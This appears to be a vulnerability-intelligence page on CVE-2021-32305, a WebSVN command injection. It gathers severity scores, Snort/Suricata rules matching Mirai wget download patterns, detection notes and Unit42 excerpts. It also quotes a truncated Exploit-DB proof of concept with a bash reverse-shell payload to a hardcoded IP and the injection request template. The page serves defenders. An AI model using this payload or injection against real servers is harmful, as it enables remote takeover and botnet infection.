CVE-2021-32305
published 2021-05-18CVE-2021-32305: WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.
PriorityP192critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
86.72%
99.7th percentile
WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| websvn | websvn | < 2.6.1 | 2.6.1 |
Detection & IOCsextracted from sources · hover to see the quote
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT WebSVN 2.6.0 OS Command Injection Inbound (CVE-2021-32305)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/search.php?search=|22 3b|"; fast_pattern; reference:cve,2021-32305; classtype:attempted-admin; sid:2033849; rev:1; metadata:attack_target Server, created_at 2021_08_31, cve CVE_2021_32305, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2021_08_31, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Mirai Infection Attempt via OS Command Injection Inbound (CVE-2021-32305)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/search.php?search=|22 3b|/bin/bash+wget+http://"; fast_pattern; pcre:"/^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$/R"; content:"|3b|+"; within:50; reference:url,unit42.paloaltonetworks.com/cve-2021-32305-websvn/; reference:cve,2021-32305; classtype:attempted-admin; sid:2033857; rev:3; metadata:created_at 2021_08_31, cve CVE_2021_32305, deployment Perimeter, malware_family Mirai, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)snort
alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET EXPLOIT Possible Mirai Infection Attempt via OS Command Injection Outbound (CVE-2021-32305)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/search.php?search=|22 3b|/bin/bash+wget+http://"; fast_pattern; pcre:"/^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$/R"; content:"|3b|+"; within:50; reference:url,unit42.paloaltonetworks.com/cve-2021-32305-websvn/; reference:cve,2021-32305; classtype:attempted-admin; sid:2033856; rev:4; metadata:created_at 2021_08_31, cve CVE_2021_32305, deployment Perimeter, malware_family Mirai, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)- →The exploit targets the `search` parameter in `/search.php`. Monitor HTTP GET requests to this endpoint containing shell metacharacters such as `";` (URL-encoded as `%22%3b` or raw `|22 3b|`) which are used to inject OS commands. ↗
- →In-the-wild Mirai exploitation payloads use the pattern `/search.php?search=|22 3b|/bin/bash+wget+http://` followed by an IP address, then `|3b|+` within 50 bytes — as captured in ET SIDs 2033856 and 2033857.
- →Post-exploitation Mirai variant beacons outbound to C2 on TCP port 666 using a custom text-based protocol; monitor for unusual outbound TCP connections to port 666 from web servers. ↗
- →Dropped Mirai binaries are packed with a modified UPX packer, causing standard UPX unpacking tools to fail. Static analysis or manual unpacking is required; automated tools will not successfully unpack these samples. ↗
- →The attack drops binaries for 12 Linux architectures via a shell script (brute-force execution of all architectures). Look for mass download activity of multiple architecture-specific ELF binaries from a single web server process shortly after a WebSVN search request. ↗
- →Palo Alto Networks Threat Prevention Signature 91280 blocks exploitation of CVE-2021-32305; ensure this signature is active on perimeter NGFWs. ↗
- ·The vulnerable code path is in `include/svnlook.php` (function `getListSearch`) and `include/command.php` (function `runCommand`). The fix applies `escapeshellarg` to the search input before shell concatenation. Verify patched deployments actually contain this fix, as the vulnerable parameter is user-controlled with no authentication required. ↗
- ·The exploit proof-of-concept uses a reverse shell payload targeting a hardcoded attacker IP (192.168.1.149:4444); real-world attacks substitute this with attacker-controlled infrastructure. Do not treat this IP as a production IOC. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-rqp6-mfj6-v759: WebSVN before 2
ghsa_unreviewed·2022-05-24
CVE-2021-32305 [CRITICAL] CWE-78 GHSA-rqp6-mfj6-v759: WebSVN before 2
WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.
VulnCheck
websvn websvn Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2021·CVSS 9.8
CVE-2021-32305 [CRITICAL] websvn websvn Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
websvn websvn Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.
Affected: websvn websvn
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/cve-2021-32305-websvn/
Exploit PoC: https://vulncheck.com/xdb/8ca1d56a1fda
Suricata
ET EXPLOIT Possible Mirai Infection Attempt via OS Command Injection Outbound (CVE-2021-32305)
suricata·2021-08-31·CVSS 9.8
CVE-2021-32305 [CRITICAL] ET EXPLOIT Possible Mirai Infection Attempt via OS Command Injection Outbound (CVE-2021-32305)
ET EXPLOIT Possible Mirai Infection Attempt via OS Command Injection Outbound (CVE-2021-32305)
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET EXPLOIT Possible Mirai Infection Attempt via OS Command Injection Outbound (CVE-2021-32305)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/search.php?search=|22 3b|/bin/bash+wget+http://"; fast_pattern; pcre:"/^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$/R"; content:"|3b|+"; within:50; reference:url,unit42.paloaltonetworks.com/cve-2021-32305-websvn/; reference:cve,2021-32305; classtype:attempted-admin; sid:2033856; rev:4; metadata:created_at 2021_08_31, cve CVE_2021_32305, deployment Perimeter, malware_family Mirai, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updat
Suricata
ET EXPLOIT WebSVN 2.6.0 OS Command Injection Inbound (CVE-2021-32305)
suricata·2021-08-31·CVSS 9.8
CVE-2021-32305 [CRITICAL] ET EXPLOIT WebSVN 2.6.0 OS Command Injection Inbound (CVE-2021-32305)
ET EXPLOIT WebSVN 2.6.0 OS Command Injection Inbound (CVE-2021-32305)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT WebSVN 2.6.0 OS Command Injection Inbound (CVE-2021-32305)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/search.php?search=|22 3b|"; fast_pattern; reference:cve,2021-32305; classtype:attempted-admin; sid:2033849; rev:1; metadata:attack_target Server, created_at 2021_08_31, cve CVE_2021_32305, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2021_08_31, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Possible Mirai Infection Attempt via OS Command Injection Inbound (CVE-2021-32305)
suricata·2021-08-31·CVSS 9.8
CVE-2021-32305 [CRITICAL] ET EXPLOIT Possible Mirai Infection Attempt via OS Command Injection Inbound (CVE-2021-32305)
ET EXPLOIT Possible Mirai Infection Attempt via OS Command Injection Inbound (CVE-2021-32305)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Mirai Infection Attempt via OS Command Injection Inbound (CVE-2021-32305)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/search.php?search=|22 3b|/bin/bash+wget+http://"; fast_pattern; pcre:"/^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$/R"; content:"|3b|+"; within:50; reference:url,unit42.paloaltonetworks.com/cve-2021-32305-websvn/; reference:cve,2021-32305; classtype:attempted-admin; sid:2033857; rev:3; metadata:created_at 2021_08_31, cve CVE_2021_32305, deployment Perimeter, malware_family Mirai, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated
Exploit-DB
Websvn 2.6.0 - Remote Code Execution (Unauthenticated)
exploitdb·2021-06-21·CVSS 9.8
CVE-2021-32305 [CRITICAL] Websvn 2.6.0 - Remote Code Execution (Unauthenticated)
Websvn 2.6.0 - Remote Code Execution (Unauthenticated)
---
# Exploit Title: Websvn 2.6.0 - Remote Code Execution (Unauthenticated)
# Date: 20/06/2021
# Exploit Author: g0ldm45k
# Vendor Homepage: https://websvnphp.github.io/
# Software Link: https://github.com/websvnphp/websvn/releases/tag/2.6.0
# Version: 2.6.0
# Tested on: Docker + Debian GNU/Linux (Buster)
# CVE : CVE-2021-32305
import requests
import argparse
from urllib.parse import quote_plus
PAYLOAD = "/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.149/4444 0>&1'"
REQUEST_PAYLOAD = '/search.php?search=";{};"'
parser = argparse.ArgumentParser(description='Send a payload to a websvn 2.6.0 server.')
parser.add_argument('target', type=str, help="Target URL.")
args = parser.parse_args()
if args.target.startswith("http://") or args.ta
Nuclei
Websvn <2.6.1 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2021-32305 [CRITICAL] Websvn <2.6.1 - Remote Code Execution
Websvn <2.6.1 - Remote Code Execution
WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.
Template:
id: CVE-2021-32305
info:
name: Websvn <2.6.1 - Remote Code Execution
author: gy741
severity: critical
description: WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
remediation: |
Upgrade Websvn to version 2.6.1 or later to mitigate this vulnerability.
reference:
- https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html
- https://github.com/websvnphp/websvn/pull/142
- http://packetstormsecu
Unit42
Network Security Trends: May-July 2021
blogs_unit42·2021-09-17
Network Security Trends: May-July 2021
## Executive Summary
Unit 42 researchers continue to observe network security trends, tracking how cybercriminals take advantage of vulnerabilities in the real world. The following sections present our analysis of the most recently published vulnerabilities, including their severity and category distribution. Additionally, we provide insight into how the vulnerabilities are exploited in the wild based on real-world data collected from Palo Alto Networks Next-Generation Firewalls. We highlight vulnerabilities ranked medium severity and above that were newly published from May-July 2021 in order to raise awareness of their active exploits in the wild. We then draw conclusions about the most commonly exploited vulnerabilities we observed attackers using, as well as the severity, category and
Unit42
Network Security Trends: May-July 2021
blogs_unit42·2021-09-17
Network Security Trends: May-July 2021
Threat Research Center
Trend Reports
Vulnerabilities
## Network Security Trends: May-July 2021
Yue Guan
Lei Xu
Published: September 17, 2021
Malware
Trend Reports
Vulnerabilities
Attack analysis
Exploit
Exploit in the wild
Network security trends
## Executive Summary
Unit 42 researchers continue to observe network security trends, tracking how cybercriminals take advantage of vulnerabilities in the real world. The following sections present our analysis of the most recently published vulnerabilities, including their severity and category distribution. Additionally, we provide insight into how the vulnerabilities are exploited in the wild based on real-world data collected from Palo Alto Networks Next-Generation Firewalls . We highlight vulnerabilities ranked medium sever
Unit42
New Mirai Variant Targets WebSVN Command Injection Vulnerability (CVE-2021-32305)
blogs_unit42·2021-08-30·CVSS 9.8
CVE-2021-32305 [CRITICAL] New Mirai Variant Targets WebSVN Command Injection Vulnerability (CVE-2021-32305)
## Executive Summary
We have observed exploits in the wild for a recently disclosed command injection vulnerability affecting WebSVN, an open-source web application for browsing source code. The critical command injection vulnerability was discovered and patched in May 2021. A proof of concept was released and within a week, on June 26, 2021, attackers exploited the vulnerability to deploy variants of the Mirai DDoS malware. We strongly recommend that WebSVN users upgrade to the latest software version.
Palo Alto Networks Next-Generation Firewalls protect customers from the exploitation of CVE-2021-32305, and Cortex XDR detects Mirai variants and prevents infection.
## Root Cause and Patch Analysis of CVE-2021-32305
Like many source code browsing tools, WebSVN allows users to search th
Unit42
New Mirai Variant Targets WebSVN Command Injection Vulnerability (CVE-2021-32305)
blogs_unit42·2021-08-30·CVSS 9.8
CVE-2021-32305 [CRITICAL] New Mirai Variant Targets WebSVN Command Injection Vulnerability (CVE-2021-32305)
Threat Research Center
Threat Research
Vulnerabilities
## New Mirai Variant Targets WebSVN Command Injection Vulnerability (CVE-2021-32305)
Brock Mammen
Haozhe Zhang
Published: August 30, 2021
Threat Research
Vulnerabilities
Botnet
CVE-2021-32305
DDoS
WebSVN
## Executive Summary
We have observed exploits in the wild for a recently disclosed command injection vulnerability affecting WebSVN, an open-source web application for browsing source code. The critical command injection vulnerability was discovered and patched in May 2021. A proof of concept was released and within a week, on June 26, 2021, attackers exploited the vulnerability to deploy variants of the Mirai DDoS malware. We strongly recommend that WebSVN users upgrade to the latest software version.
Palo Alto Net
Greynoiseio
Malicious Tag Roundup (January 2022)
blogs_greynoiseio
Malicious Tag Roundup (January 2022)
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
2021-05-18
Published
Exploited in the wild